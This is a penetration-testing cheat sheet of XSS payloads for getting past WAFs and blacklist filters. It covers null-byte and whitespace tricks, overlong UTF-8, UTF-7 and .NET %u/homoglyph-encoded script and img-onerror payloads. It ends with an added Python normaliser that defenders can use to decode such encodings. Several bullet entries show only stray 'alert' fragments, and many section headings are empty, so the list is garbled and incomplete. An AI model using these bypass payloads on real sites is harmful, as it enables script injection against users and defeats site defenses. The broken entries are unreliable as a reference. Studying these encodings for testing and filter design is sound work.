# A collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering

## Simple character manipulations

Note that I use hexadecimal to represent characters that you probably can't type. For example, `\x00` equals a null byte, but you'll need to encode this properly depending on the context (URL encoding `\x00` = `%00`).

- HaRdc0r3 caS3 s3nsit1vITy bYpa55!
- Null-byte character between HTML attribute name and equal sign (IE, Safari).
- Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
- Vertical tab between HTML attribute name and equal sign (IE, Safari).
- Null-byte character between equal sign and JavaScript code (IE).
- Null-byte character between characters of HTML attribute names (IE).
- Null-byte character before characters of HTML element names (IE): `<\x00img src='1' onerror=alert(0) />`
- Null-byte character after characters of HTML element names (IE, Safari). `alert(1)`
- Null-byte character between characters of HTML element names (IE).
- Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
- Use vertical tabs instead of whitespace (IE, Safari).
- Use quotes instead of whitespace in some situations (Safari).
- Use null-bytes instead of whitespaces in some situations (IE).
- Just don't use spaces (IE, Firefox, Chrome, Safari).
- Prefix URI schemes: Firefox (`\x09`, `\x0a`, `\x0d`, `\x20`); Chrome (any character `\x01` to `\x20`).
- No greater-than characters needed (IE, Firefox, Chrome, Safari). `alert(0)`
- Backslash character between expression and opening parenthesis (IE).

## JavaScript Escaping

## Encoding Galore

### HTML Attribute Encoding

### URL Encoding

### CSS Hexadecimal Encoding (IE specific examples)
### JavaScript (hexadecimal, octal, and unicode)

### JavaScript (Decimal char codes)

### JavaScript (Unicode function and variable names)

### Overlong UTF-8 (SiteMinder is awesome!)

| Character | 2-byte form | 3-byte form | 4-byte form |
|-----------|-------------|-------------|-------------|
| `<`       | `%C0%BC`    | `%E0%80%BC` | `%F0%80%80%BC` |
| `>`       | `%C0%BE`    | `%E0%80%BE` | `%F0%80%80%BE` |
| `'`       | `%C0%A7`    | `%E0%80%A7` | `%F0%80%80%A7` |
| `"`       | `%C0%A2`    | `%E0%80%A2` | `%F0%80%80%A2` |

`%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE`

### UTF-7 (Missing charset?)

`+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-`

### Unicode .NET Ugliness

`%uff1cscript%uff1ealert(1)%uff1c/script%uff1e`

Classic ASP performs some unicode homoglyphic translations... don't ask why...

`%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A`

## Useless and/or Useful features

### HTML 5 (Not comprehensive)
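A defender-side normaliser for the encodings catalogued above (overlong UTF-8, `%uXXXX`, UTF-7, fullwidth homoglyphs), added here as an example and not part of the original list: it reduces an encoded input to the text a lenient browser or server would act on, so a filter or detection rule inspects the same characters. The function names are my own; the U+3008/U+232A to `<`/`>` folding is taken from the Classic ASP observation above, and a sample input in the test is the page's own payload.

```python
import re
import unicodedata

# Angle-bracket homoglyphs the page says Classic ASP folds to < and >; NFKC turns
# U+2329/U+232A into U+3008/U+3009 first but stops there, so finish the job here.
ANGLE_HOMOGLYPHS = str.maketrans({"\u3008": "<", "\u3009": ">"})
_PCT_RUN = re.compile(r"(?:%[0-9a-fA-F]{2})+")   # maximal run of %XX escapes
_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")        # non-standard %uXXXX escape


def decode_lenient_utf8(data: bytes) -> tuple[str, bool]:
    """Decode UTF-8 the way a tolerant parser does: overlong (non-shortest-form)
    sequences such as C0 BC for '<' are accepted, and their presence is reported."""
    out, overlong, i = [], False, 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            out.append(chr(lead)); i += 1; continue
        n = 0 if lead < 0xC0 else 2 if lead < 0xE0 else 3 if lead < 0xF0 else 4 if lead < 0xF8 else 0
        tail = data[i + 1:i + n]
        if n == 0 or len(tail) != n - 1 or any(t >> 6 != 0b10 for t in tail):
            out.append("\ufffd"); i += 1; continue      # malformed byte: replace and resync
        cp = lead & (0x7F >> n)                          # payload bits of the lead byte
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp < (0x80, 0x800, 0x10000)[n - 2]:          # fits in fewer bytes: overlong form
            overlong = True
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += n
    return "".join(out), overlong


def canonicalize(raw: str) -> tuple[str, bool]:
    """Reduce an encoded input to the text a lenient browser or server acts on, so a
    filter inspects the same characters. Returns (text, saw_overlong_utf8)."""
    seen = [False]
    def pct(m: re.Match) -> str:
        text, overlong = decode_lenient_utf8(bytes.fromhex(m.group(0).replace("%", "")))
        seen[0] |= overlong
        return text

    s = _PCT_RUN.sub(pct, raw)                              # %XX runs -> bytes -> text
    s = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), s)   # %uXXXX (.NET / Classic ASP)
    if s.isascii() and "+" in s:                            # UTF-7 when no charset is pinned
        try:
            s = s.encode("ascii").decode("utf-7")
        except UnicodeDecodeError:
            pass
    s = unicodedata.normalize("NFKC", s)                    # fullwidth forms -> ASCII
    return s.translate(ANGLE_HOMOGLYPHS).replace("\x00", ""), seen[0]  # drop ignored NULs
```

Run the canonicalised text, not the raw request, through your pattern matching, and treat the overlong flag itself as a strong signal: well-behaved clients never emit non-shortest-form UTF-8.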